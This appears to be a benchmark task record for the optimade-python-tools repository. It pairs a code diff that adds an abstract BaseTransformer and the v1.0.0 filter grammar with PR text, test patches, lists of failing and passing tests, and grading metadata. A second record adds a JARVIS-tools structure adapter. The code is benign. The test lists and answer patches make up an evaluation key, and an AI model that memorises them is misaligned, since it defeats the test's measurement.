"fuzzy_string_op_rhs" - - def set_op_rhs(self, arg): - # set_op_rhs: HAS ( [ OPERATOR ] value | ALL value_list | ANY value_list | ONLY value_list ) - print("Node: ", "set_op_rhs", arg) - return "set_op_rhs" - - def set_zip_op_rhs(self, arg): - # set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | - # ANY value_zip_list ) - print("Node: ", "set_zip_op_rhs", arg) - return "set_zip_op_rhs" - - def length_comparison(self, arg): - # length_comparison: LENGTH property OPERATOR value - print("Node: ", "length_comparison", arg) - return "length_comparison" - - def property_zip_addon(self, arg): - # property_zip_addon: ":" property (":" property)* - print("Node: ", "property_zip_addon", arg) - return "property_zip_addon" - - def property(self, arg): - # property: IDENTIFIER ( "." IDENTIFIER )* - print("Node: ", "property", arg) - return "property" - - def string(self, arg): - # string: ESCAPED_STRING - print("Node: ", "string", arg) - return "string" - - def number(self, arg): - # number: SIGNED_INT | SIGNED_FLOAT - print("Node: ", "number", arg) - return "number" - - def __default__(self, data, children, meta): - print("Node: ", data, children) - return data - - -if __name__ == "__main__": # pragma: no cover - from optimade.filterparser import LarkParser - - p = LarkParser(version=(0, 10, 0)) - # t = DebugTransformer() - t = TransformerSkeleton() - - # f = 'a.a = "text" OR a<a AND NOT b>=8' - - # single list - - f = "list HAS < 3" - - f = "list HAS < 3, > 4" # -> error - f = "list HAS ALL < 3, > 4" - - # multiple lists - - f = "list1:list2 HAS < 3 : > 4" - f = "list1:list2 HAS ALL < 3 : > 4" - - f = "list1:list2 HAS < 3 : > 4, < 2 : > 5" # -> error - f = "list1:list2 HAS ALL < 3 : > 4, < 2 : > 5" - f = "list1:list2 HAS ALL < 3, < 2 : > 4, > 5" # -> error - - # f = 'list1:list2 HAS < 3, > 4' # -> error - # f = 'list1:list2 HAS ALL < 3, > 4' # -> error - - f = 'elements:elements_ratios HAS ALL "Al":>0.3333, "Al":<0.3334' - f = 
'elements:elements_ratios HAS ALL "Al":>0.3333 AND elements_ratio<0.3334' - f = 'elements:elements_ratios HAS ALL "Al" : >0.3333, <0.3334' # -> error - - f = "list1:list2 HAS ALL < 3 : > 4, < 2 : > 5 : > 4, < 2 : > 5" # valid but wrong - f = "ghf.flk<gh" # valid but wrong - - # f = '' - - tree = p.parse(f) - print(tree) - print(tree.pretty()) - - t.transform(tree) diff --git a/optimade/filtertransformers/django.py b/optimade/filtertransformers/django.py index 3a1daf73..2e101c3a 100644 --- a/optimade/filtertransformers/django.py +++ b/optimade/filtertransformers/django.py @@ -1,3 +1,11 @@ +import warnings + +warnings.warn( + "Django functionality is deprecated and will be removed in later versions (unless support is requested).", + DeprecationWarning, + stacklevel=2, +) + import operator from optimade.filterparser import LarkParser from lark import Tree @@ -5,6 +13,9 @@ from lark.lexer import Token from django.db.models import Q +__all__ = ("DjangoTransformer",) + + class DjangoQueryError(Exception): pass @@ -19,7 +30,16 @@ django_db_keys = { } -class Lark2Django: +class DjangoTransformer: + """Filter transformer for implementations using Django. + + !!! warning "Warning" + This transformer is deprecated as it only supports + the 0.9.7 grammar version, and works different to other + filter transformers in this package. 
+ + """ + def __init__(self): self.opers = { "=": self.eq, diff --git a/optimade/filtertransformers/elasticsearch.py b/optimade/filtertransformers/elasticsearch.py index f788b5ba..6dd900ef 100644 --- a/optimade/filtertransformers/elasticsearch.py +++ b/optimade/filtertransformers/elasticsearch.py @@ -4,6 +4,11 @@ import lark from elasticsearch_dsl import Q, Text, Keyword, Integer, Field from optimade.models import CHEMICAL_SYMBOLS, ATOMIC_NUMBERS +__all__ = ( + "ElasticTransformer", + "Transformer", +) + _cmp_operators = {">": "gt", ">=": "gte", "<": "lt", "<=": "lte"} _rev_cmp_operators = {">": "<", ">=": "<=", "<": ">", "<=": "=>"} @@ -65,8 +70,8 @@ class Quantity: return self.name -class Transformer(lark.Transformer): - """Transformer that transforms ``v0.10.0`` grammer parse trees into queries. +class ElasticTransformer(lark.Transformer): + """Transformer that transforms ``v0.10.0`` grammar parse trees into queries. Uses elasticsearch_dsl and will produce a `Q` instance. """ @@ -286,3 +291,7 @@ class Transformer(lark.Transformer): def string_literal(self, args): return args[0].strip('"') + + +# added for potential backward compatibility +Transformer = ElasticTransformer diff --git a/optimade/filtertransformers/json.py b/optimade/filtertransformers/json.py deleted file mode 100644 index 5427be2d..00000000 --- a/optimade/filtertransformers/json.py +++ /dev/null @@ -1,37 +0,0 @@ -from lark import Transformer -from lark.lexer import Token - - -class JSONTransformer(Transformer): # pragma: no cover - def __init__(self, compact=False): - self.compact = compact - super().__init__() - - def __default__(self, data, children, meta): - items = [] - for c in children: - if isinstance(c, Token): - token_repr = { - "@module": "lark.lexer", - "@class": "Token", - "type_": c.type, - "value": c.value, - } - if self.compact: - del token_repr["@module"] - del token_repr["@class"] - items.append(token_repr) - elif isinstance(c, dict): - items.append(c) - else: - raise 
ValueError(f"Unknown type {type(c)} for tree child {c}") - tree_repr = { - "@module": "lark", - "@class": "Tree", - "data": data, - "children": items, - } - if self.compact: - del tree_repr["@module"] - del tree_repr["@class"] - return tree_repr diff --git a/optimade/filtertransformers/mongo.py b/optimade/filtertransformers/mongo.py index 3500f575..9b09844a 100755 --- a/optimade/filtertransformers/mongo.py +++ b/optimade/filtertransformers/mongo.py @@ -1,11 +1,18 @@ import copy -from lark import Transformer, v_args, Token -from optimade.server.mappers import BaseResourceMapper +from lark import v_args, Token +from optimade.filtertransformers.base_transformer import BaseTransformer from optimade.server.exceptions import BadRequest +__all__ = ("MongoTransformer",) -class MongoTransformer(Transformer): - """Support for grammar v0.10.1""" + +class MongoTransformer(BaseTransformer): + """Transformer for MongoDB backend. Parses lark tree into + a dictionary to be passed to pymongo/mongomock. Uses + post-processing functions to handle aliasing and some + specific edge-cases for MongoDB. + + """ operator_map = { "<": "$lt", @@ -24,14 +31,6 @@ class MongoTransformer(Transformer): "$eq": "$eq", } - def __init__(self, mapper: BaseResourceMapper = None): - """Initialise the object, optionally loading in a - resource mapper for use when post-processing. - - """ - self.mapper = mapper - super().__init__() - def postprocess(self, query): """ Used to post-process the final parsed query. """ if self.mapper: @@ -46,41 +45,6 @@ class MongoTransformer(Transformer): return query - def transform(self, tree): - return self.postprocess(super().transform(tree)) - - def filter(self, arg): - # filter: expression* - return arg[0] if arg else None - - @v_args(inline=True) - def constant(self, value): - # constant: string | number - # Note: Do nothing! - return value - - @v_args(inline=True) - def value(self, value): - # value: string | number | property - # Note: Do nothing! 
- return value - - @v_args(inline=True) - def non_string_value(self, value): - """ non_string_value: number | property """ - # Note: Do nothing! - return value - - @v_args(inline=True) - def not_implemented_string(self, value): - """not_implemented_string: value - - Raise NotImplementedError. - For further information, see Materials-Consortia/OPTIMADE issue 157: - https://github.com/Materials-Consortia/OPTIMADE/issues/157 - """ - raise NotImplementedError("Comparing strings is not yet implemented.") - def value_list(self, arg): # value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* # NOTE: no support for optional OPERATOR, yet, so this takes the @@ -115,12 +79,6 @@ class MongoTransformer(Transformer): # expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) return self._recursive_expression_phrase(arg) - @v_args(inline=True) - def comparison(self, value): - # comparison: constant_first_comparison | property_first_comparison - # Note: Do nothing! - return value - def property_first_comparison(self, arg): # property_first_comparison: property ( value_op_rhs | known_op_rhs | fuzzy_string_op_rhs | set_op_rhs | # set_zip_op_rhs | length_op_rhs ) @@ -204,34 +162,6 @@ class MongoTransformer(Transformer): # property_zip_addon: ":" property (":" property)* raise NotImplementedError - def property(self, arg): - # property: IDENTIFIER ( "." IDENTIFIER )* - return ".".join(arg) - - @v_args(inline=True) - def string(self, string): - # string: ESCAPED_STRING - return string.strip('"') - - @v_args(inline=True) - def signed_int(self, number): - # signed_int : SIGNED_INT - return int(number) - - @v_args(inline=True) - def number(self, number): - # number: SIGNED_INT | SIGNED_FLOAT - if number.type == "SIGNED_INT": - type_ = int - elif number.type == "SIGNED_FLOAT": - type_ = float - return type_(number) - - def __default__(self, data, children, meta): - raise NotImplementedError( - f"Calling __default__, i.e., unknown grammar concept. 
data: {data}, children: {children}, meta: {meta}" - ) - def _recursive_expression_phrase(self, arg): """Helper function for parsing `expression_phrase`. Recursively sorts out the correct precedence for `$and`, `$or` and `$nor`. diff --git a/optimade/grammar/v0.10.1.lark b/optimade/grammar/v0.10.1.lark deleted file mode 100644 index 573b1d6a..00000000 --- a/optimade/grammar/v0.10.1.lark +++ /dev/null @@ -1,111 +0,0 @@ -// optimade v0.10.1 grammar spec in lark grammar format - -?start: filter -filter: expression* - -// Values -constant: string | number -// Note: support for property in value is OPTIONAL -value: string | number | property - -// Note: not_implemented_string is only here to help Transformers -non_string_value: number | property -not_implemented_string: string - -// Note: support for OPERATOR in value_list is OPTIONAL -value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* -// Note: support for OPERATOR in value_zip is OPTIONAL -value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* -value_zip_list: value_zip ( "," value_zip )* - -// Expressions -expression: expression_clause ( _OR expression_clause )* -expression_clause: expression_phrase ( _AND expression_phrase )* -expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) -// Note: support for constant_first_comparison is OPTIONAL -comparison: constant_first_comparison | property_first_comparison - -// Note: support for set_zip_op_rhs in comparison is OPTIONAL -property_first_comparison: property ( value_op_rhs - | known_op_rhs - | fuzzy_string_op_rhs - | set_op_rhs - | set_zip_op_rhs - | length_op_rhs ) - -constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) - -value_op_rhs: OPERATOR value -known_op_rhs: IS ( KNOWN | UNKNOWN ) -fuzzy_string_op_rhs: CONTAINS value - | STARTS [ WITH ] value - | ENDS [ WITH ] value -// Note: support for ONLY in set_op_rhs is OPTIONAL -// Note: support for [ OPERATOR ] in set_op_rhs is OPTIONAL -// 
set_op_rhs: HAS [ ALL | ANY | ONLY] value_list -set_op_rhs: HAS ( [ OPERATOR ] value - | ALL value_list - | ANY value_list - | ONLY value_list ) - -// Note: support for [ OPERATOR ] is OPTIONAL -length_op_rhs: LENGTH [ OPERATOR ] signed_int - -set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | ANY value_zip_list ) -property_zip_addon: ":" property (":" property)* - -// Property syntax -property: IDENTIFIER ( "." IDENTIFIER )* - -// String syntax -string: ESCAPED_STRING - -// Number token syntax -number: SIGNED_INT | SIGNED_FLOAT - -// Custom signed int -signed_int: SIGNED_INT - -// Tokens - -// Boolean relations -_AND: "AND" -_OR: "OR" -NOT: "NOT" - -IS: "IS" -KNOWN: "KNOWN" -UNKNOWN: "UNKNOWN" - -CONTAINS: "CONTAINS" -STARTS: "STARTS" -ENDS: "ENDS" -WITH: "WITH" - -LENGTH: "LENGTH" -HAS: "HAS" -ALL: "ALL" -ONLY: "ONLY" -ANY: "ANY" - -// Comparison OPERATORs -OPERATOR: ( "<" ["="] | ">" ["="] | ["!"] "=" ) - -IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | LCASE_LETTER | DIGIT )* -LCASE_LETTER: "a".."z" -DIGIT: "0".."9" - -// Strings - -_STRING_INNER: /(.|[\t\f\r\n])*?/ -_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ - -ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" - - -%import common.SIGNED_INT -%import common.SIGNED_FLOAT - -// White-space -%import common.WS -%ignore WS diff --git a/optimade/grammar/v0.10.1.lark b/optimade/grammar/v0.10.1.lark new file mode 120000 index 00000000..c5582225 --- /dev/null +++ b/optimade/grammar/v0.10.1.lark @@ -0,0 +1,1 @@ +v1.0.0.lark \ No newline at end of file diff --git a/optimade/grammar/v1.0.0.lark b/optimade/grammar/v1.0.0.lark new file mode 100644 index 00000000..974225a6 --- /dev/null +++ b/optimade/grammar/v1.0.0.lark @@ -0,0 +1,111 @@ +// optimade v1.0.0 (also valid for v0.10.1) grammar spec in lark grammar format + +?start: filter +filter: expression* + +// Values +constant: string | number +// Note: support for property in value is OPTIONAL +value: string | number | property + 
+// Note: not_implemented_string is only here to help Transformers +non_string_value: number | property +not_implemented_string: string + +// Note: support for OPERATOR in value_list is OPTIONAL +value_list: [ OPERATOR ] value ( "," [ OPERATOR ] value )* +// Note: support for OPERATOR in value_zip is OPTIONAL +value_zip: [ OPERATOR ] value ":" [ OPERATOR ] value (":" [ OPERATOR ] value)* +value_zip_list: value_zip ( "," value_zip )* + +// Expressions +expression: expression_clause ( _OR expression_clause )* +expression_clause: expression_phrase ( _AND expression_phrase )* +expression_phrase: [ NOT ] ( comparison | "(" expression ")" ) +// Note: support for constant_first_comparison is OPTIONAL +comparison: constant_first_comparison | property_first_comparison + +// Note: support for set_zip_op_rhs in comparison is OPTIONAL +property_first_comparison: property ( value_op_rhs + | known_op_rhs + | fuzzy_string_op_rhs + | set_op_rhs + | set_zip_op_rhs + | length_op_rhs ) + +constant_first_comparison: constant OPERATOR ( non_string_value | not_implemented_string ) + +value_op_rhs: OPERATOR value +known_op_rhs: IS ( KNOWN | UNKNOWN ) +fuzzy_string_op_rhs: CONTAINS value + | STARTS [ WITH ] value + | ENDS [ WITH ] value +// Note: support for ONLY in set_op_rhs is OPTIONAL +// Note: support for [ OPERATOR ] in set_op_rhs is OPTIONAL +// set_op_rhs: HAS [ ALL | ANY | ONLY] value_list +set_op_rhs: HAS ( [ OPERATOR ] value + | ALL value_list + | ANY value_list + | ONLY value_list ) + +// Note: support for [ OPERATOR ] is OPTIONAL +length_op_rhs: LENGTH [ OPERATOR ] signed_int + +set_zip_op_rhs: property_zip_addon HAS ( value_zip | ONLY value_zip_list | ALL value_zip_list | ANY value_zip_list ) +property_zip_addon: ":" property (":" property)* + +// Property syntax +property: IDENTIFIER ( "." 
IDENTIFIER )* + +// String syntax +string: ESCAPED_STRING + +// Number token syntax +number: SIGNED_INT | SIGNED_FLOAT + +// Custom signed int +signed_int: SIGNED_INT + +// Tokens + +// Boolean relations +_AND: "AND" +_OR: "OR" +NOT: "NOT" + +IS: "IS" +KNOWN: "KNOWN" +UNKNOWN: "UNKNOWN" + +CONTAINS: "CONTAINS" +STARTS: "STARTS" +ENDS: "ENDS" +WITH: "WITH" + +LENGTH: "LENGTH" +HAS: "HAS" +ALL: "ALL" +ONLY: "ONLY" +ANY: "ANY" + +// Comparison OPERATORs +OPERATOR: ( "<" ["="] | ">" ["="] | ["!"] "=" ) + +IDENTIFIER: ( "_" | LCASE_LETTER ) ( "_" | LCASE_LETTER | DIGIT )* +LCASE_LETTER: "a".."z" +DIGIT: "0".."9" + +// Strings + +_STRING_INNER: /(.|[\t\f\r\n])*?/ +_STRING_ESC_INNER: _STRING_INNER /(?<!\\)(\\\\)*?/ + +ESCAPED_STRING : "\"" _STRING_ESC_INNER "\"" + + +%import common.SIGNED_INT +%import common.SIGNED_FLOAT + +// White-space +%import common.WS +%ignore WS diff --git a/optimade/server/entry_collections/mongo.py b/optimade/server/entry_collections/mongo.py index ea9705be..2e68a41d 100644 --- a/optimade/server/entry_collections/mongo.py +++ b/optimade/server/entry_collections/mongo.py @@ -65,9 +65,7 @@ class MongoCollection(EntryCollection): MongoTransformer(mapper=resource_mapper), ) - self.parser = LarkParser( - version=(0, 10, 1), variant="default" - ) # The MongoTransformer only supports v0.10.1 as the latest grammar + self.parser = LarkParser(version=(1, 0, 0), variant="default") # check aliases do not clash with mongo operators self._check_aliases(self.resource_mapper.all_aliases()) diff --git a/optimade/validator/__init__.py b/optimade/validator/__init__.py index a6df19a3..c14ae58d 100644 --- a/optimade/validator/__init__.py +++ b/optimade/validator/__init__.py @@ -5,7 +5,7 @@ from .validator import ImplementationValidator __all__ = ["ImplementationValidator", "validate"] -def validate(): +def validate(): # pragma: no cover import argparse import sys import os
Create template filtertransformer BaseTransformer Here's a first pass at a `BaseTransformer`. I think we need to discuss what to do with the Django, JSON and TransformerSkeleton and elasticsearch transformers, plus all the grammar variants... I haven't really gotten my head around how lark interacts with these magic-word methods, and how we currently have different method names between al the transformers. For now, I've made most of the `BaseTransformer` methods abstract, apart from those that do very simple things (i.e. take in a value and return value). - [x] Add deprecation warning for `Lark2Django`/`DjangoTransformer`, which is working from 0.9.7 grammar and will be tricky to adapt - [x] Remove `JSONTransformer` and `DebugTransformer` (and updated docs) - [x] Created abstract `BaseTransformer` and pulled mongo functionality out - [x] Made file for `v1.0.0` grammar that links to `v0.10.1`
**Title** Align filter parsing and transformation to the v1.0.0 grammar and consolidate transformer architecture **Problem** The package still referenced the historic `Parser` and outdated transformer classes (JSON, Debug, Django), causing version mismatches and duplicated logic across back‑ends. Documentation and server code also pointed to the old grammar version, leading to confusion for users and maintainers. **Root Cause** Legacy transformer implementations were never unified under a common base and remained tied to the previous grammar (v0.9.7/v0.10.1). **Fix / Expected Behavior** - Update examples and documentation to use the new `LarkParser` with the v1.0.0 grammar. - Remove the obsolete `JSONTransformer` and `DebugTransformer` modules and their docs. - Emit a deprecation warning for the Django transformer and clarify its limited future support. - Introduce an abstract `BaseTransformer` that centralises shared, backend‑agnostic parsing logic. - Refactor the Mongo transformer to inherit from `BaseTransformer` and rely on the unified implementation. - Adjust the server’s Mongo collection to instantiate the parser at version 1.0.0. - Expose the transformer package’s public API via an `__init__` stub. **Risk & Validation** - Run the full test suite, especially transformer‑related tests, to confirm existing Mongo queries produce identical results. - Verify that documentation builds without broken links or outdated code snippets. - Ensure the deprecation warning for Django is raised correctly without affecting existing functionality.
287
Materials-Consortia/optimade-python-tools
diff --git a/tests/filterparser/test_filterparser.py b/tests/filterparser/test_filterparser.py index f4ef123b..d4a40374 100644 --- a/tests/filterparser/test_filterparser.py +++ b/tests/filterparser/test_filterparser.py @@ -40,8 +40,8 @@ class TestParserV0_9_5: assert repr(self.parser) is not None -class TestParserV0_10_1: - version = (0, 10, 1) +class TestParserV1_0_0: + version = (1, 0, 0) variant = "default" @pytest.fixture(autouse=True) diff --git a/tests/filtertransformers/test_django.py b/tests/filtertransformers/test_django.py index 55e90b92..8a969b38 100644 --- a/tests/filtertransformers/test_django.py +++ b/tests/filtertransformers/test_django.py @@ -16,12 +16,12 @@ test_data = [ ] -class TestLark2Django: +class TestDjangoTransformer: @pytest.fixture(autouse=True) def set_up_class(self): - from optimade.filtertransformers.django import Lark2Django + from optimade.filtertransformers.django import DjangoTransformer - self.Transformer = Lark2Django() + self.Transformer = DjangoTransformer() def test_query_conversion(self): for raw_q, dj_q in test_data: diff --git a/tests/filtertransformers/test_mongo.py b/tests/filtertransformers/test_mongo.py index c9462baf..6bcc9892 100644 --- a/tests/filtertransformers/test_mongo.py +++ b/tests/filtertransformers/test_mongo.py @@ -7,7 +7,7 @@ from optimade.server.exceptions import BadRequest class TestMongoTransformer: - version = (0, 10, 1) + version = (1, 0, 0) variant = "default" @pytest.fixture(autouse=True)
[ "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_special_cases", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_repr", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_empty", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_property_names", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_string_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_number_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_simple_comparisons", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_id", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_operators", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_filtering_on_relationships", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_not_implemented", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_length_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_unaliased_length_operator", 
"tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_known_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_precedence", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_special_cases" ]
[ "tests/filterparser/test_filterparser.py::TestParserV0_9_5::test_inputs", "tests/filterparser/test_filterparser.py::TestParserV0_9_5::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV0_9_5::test_repr" ]
Method: DjangoTransformer.__init__(self) Location: optimade.filtertransformers.django.DjangoTransformer.__init__ Inputs: None (no parameters) Outputs: An instance of DjangoTransformer (e.g. self.Transformer = DjangoTransformer()) Description: Constructs the (deprecated) Django filter transformer that converts a parsed Lark filter tree into a Django Q object. No arguments are required. Function: DjangoTransformer() Location: optimade.filtertransformers.django.DjangoTransformer (class callable) Inputs: None Outputs: New DjangoTransformer object Description: Callable alias for the class constructor; creates a transformer instance used in tests to convert filter expressions to Django queries.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/filterparser/test_filterparser.py tests/filtertransformers/test_django.py tests/filtertransformers/test_mongo.py" }
{ "num_modified_files": 10, "num_modified_lines": 384, "pr_author": "ml-evs", "pr_labels": [ "blocking: For issues/PRs that are blocking other PRs.", "priority/medium: Issue or PR with a consensus of medium priority", "transformers: Related to all filter transformers" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests creation of a generic BaseTransformer class and related refactoring (renaming, deprecation warnings, grammar version bump). The test patch updates version numbers and class names to match the new implementation, aligning with the described changes. No test expectations conflict with the problem statement and no hidden external dependencies are evident. 
Therefore the task is well specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e1cac1e0408ca236ae1d37a9f184eaed170e8f54
2020-06-10 07:11:30
CasperWA: > Yes, I think so too. But we do not have the vacancy in the Specie object. We mention in the 'test_special_species' function. We define a separate Vacancy object. So the `chemical_symbols` is a list of chemical elements (case sensitive), but can also include `"X"` as an unknown element, which isn't a vacancy, and then of course also `"vacancy"`, which will represent a vacancy. If `jarvis.core.atoms.Atoms` cannot handle these (`"X"`), you should try to handle that before returning the `Atoms` object. For `"vacancy"` you're already doing this, since you're checking for `"disorder"` and raising if found in `structure_features`, so that's excellent! :) However, a structure may also have a single `species` with `chemical_symbols = ["X"]`, which isn't caught by this check. Would this break jarvis' Atoms? Actually, we are not properly testing for this at the moment! So I think I'll create a separate PR adding this test. For this PR, I consider it good-enough at this time, but the adapter may have to be updated for the separate PR. If you want to include the "fix" already in this PR that's great! :) Otherwise I would consider it fine to add it in the separate PR, including the other fixes that would need to be done (for, e.g., ASE). CasperWA: @knc6 I've been looking a bit into the code of jarvis, and it seems the `Specie` class you're wrapping the entries of `Atoms.elements` in takes a `str` as initializer. I would suggest to then initialize your `Atoms` instance in the adapter, providing `elements` with a generated list of OPTIMADE species' `name` key, i.e.: ```python3 Atoms( elements=[specie.name for specie in attributes.species], # ... other instantiating attributes ... ) ``` Do you think this makes sense? Instead of your `Specie` class having to initalize with `symbol` being a Python dictionary instead of a string (which would currently be the case)? 
CasperWA: @knc6 I have updated your test here to take into account structures with special non-disordered species (i.e., updating it according to the newly added tests in #305. I hope it's all right? If not, please make the appropriate changes on top. If you're having trouble getting a local version matching the one here on github, you can first do `git fetch --all -p` followed by (as long as you have checked out this branch locally) `git reset --hard knc6/master`. This will reset your local version of the branch to the one on GitHub disregarding any differences. knc6: @CasperWA I changed the jarvis.py in the adapters/structures accordingly. Your changes makes sense to me. Atoms constructor should be able to take 'X' or any other character. It will only fail, if we ask for some chemical properties such as Specie('X').atomic_mass.
materials-consortia__optimade-python-tools-297
diff --git a/optimade/adapters/structures/__init__.py b/optimade/adapters/structures/__init__.py index 048800be..6922615c 100644 --- a/optimade/adapters/structures/__init__.py +++ b/optimade/adapters/structures/__init__.py @@ -6,6 +6,7 @@ from .ase import get_ase_atoms from .cif import get_cif from .proteindatabank import get_pdb, get_pdbx_mmcif from .pymatgen import get_pymatgen +from .jarvis import get_jarvis_atoms __all__ = ("Structure",) @@ -24,4 +25,5 @@ class Structure(EntryAdapter): "pdb": get_pdb, "pdbx_mmcif": get_pdbx_mmcif, "pymatgen": get_pymatgen, + "jarvis": get_jarvis_atoms, } diff --git a/optimade/adapters/structures/jarvis.py b/optimade/adapters/structures/jarvis.py new file mode 100644 index 00000000..c1520001 --- /dev/null +++ b/optimade/adapters/structures/jarvis.py @@ -0,0 +1,43 @@ +from warnings import warn +from optimade.models import StructureResource as OptimadeStructure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.utils import pad_positions + +try: + from jarvis.core.atoms import Atoms +except (ImportError, ModuleNotFoundError): + Atoms = None + JARVIS_NOT_FOUND = "jarvis-tools package not found, cannot convert structure to a JARVIS Atoms. Visit https://github.com/usnistgov/jarvis" + + +__all__ = ("get_jarvis_atoms",) + + +def get_jarvis_atoms(optimade_structure: OptimadeStructure) -> Atoms: + """ Get jarvis Atoms from OPTIMADE structure + + NOTE: Cannot handle partial occupancies + + :param optimade_structure: OPTIMADE structure + :return: jarvis.core.Atoms + """ + if globals().get("Atoms", None) is None: + warn(JARVIS_NOT_FOUND) + return None + + attributes = optimade_structure.attributes + + # Cannot handle partial occupancies + if "disorder" in attributes.structure_features: + raise ConversionError( + "jarvis-tools cannot handle structures with partial occupancies." 
+ ) + + cartesian_site_positions, _ = pad_positions(attributes.cartesian_site_positions) + + return Atoms( + lattice_mat=attributes.lattice_vectors, + elements=[specie.name for specie in attributes.species], + coords=cartesian_site_positions, + cartesian=True, + ) diff --git a/setup.py b/setup.py index 5c663277..96f70e00 100644 --- a/setup.py +++ b/setup.py @@ -16,6 +16,7 @@ ase_deps = ["ase~=3.19"] cif_deps = ["numpy~=1.18"] pdb_deps = cif_deps pymatgen_deps = ["pymatgen~=2020.3"] +jarvis_deps = ["jarvis-tools~=2020.6"] client_deps = cif_deps # General @@ -27,7 +28,15 @@ testing_deps = [ "jsondiff", ] + server_deps dev_deps = ["pylint", "black", "pre-commit", "invoke"] + testing_deps + client_deps -all_deps = dev_deps + django_deps + elastic_deps + aiida_deps + ase_deps + pymatgen_deps +all_deps = ( + dev_deps + + django_deps + + elastic_deps + + aiida_deps + + ase_deps + + pymatgen_deps + + jarvis_deps +) setup( name="optimade", @@ -76,6 +85,7 @@ setup( "cif": cif_deps, "pdb": pdb_deps, "pymatgen": pymatgen_deps, + "jarvis": jarvis_deps, }, entry_points={ "console_scripts": ["optimade_validator=optimade.validator:validate"]
Adding jarvis-tools structures
**Title** Add JARVIS‑tools support to the structure adapter **Problem** The library could convert OPTIMADE structures only to ASE, CIF, PDB, and Pymatgen representations. Users needing JARVIS‑tools atoms had no way to obtain them, limiting interoperability with workflows that rely on that package. **Root Cause** The JARVIS‑tools backend was never integrated into the structure‑adapter registry and its optional dependency was not declared. **Fix / Expected Behavior** - Introduce a conversion routine that builds a JARVIS‑tools `Atoms` object from an OPTIMADE structure. - Register the new routine alongside the existing backends so it can be selected via the same interface. - Declare the `jarvis-tools` package as an optional extra and include it in the aggregate dependencies. - Emit a clear warning and return `None` when the JARVIS‑tools library is unavailable. - Raise a conversion error for structures with partial occupancies, which JARVIS‑tools cannot represent. **Risk & Validation** - Adding a new optional dependency may affect environments where JARVIS‑tools is not installed; the warning path mitigates crashes. - Verify that the new converter produces correct `Atoms` objects for standard structures and that the warning is triggered when the library is absent. - Ensure existing conversion pathways remain unchanged and all tests pass after the dependency update.
297
Materials-Consortia/optimade-python-tools
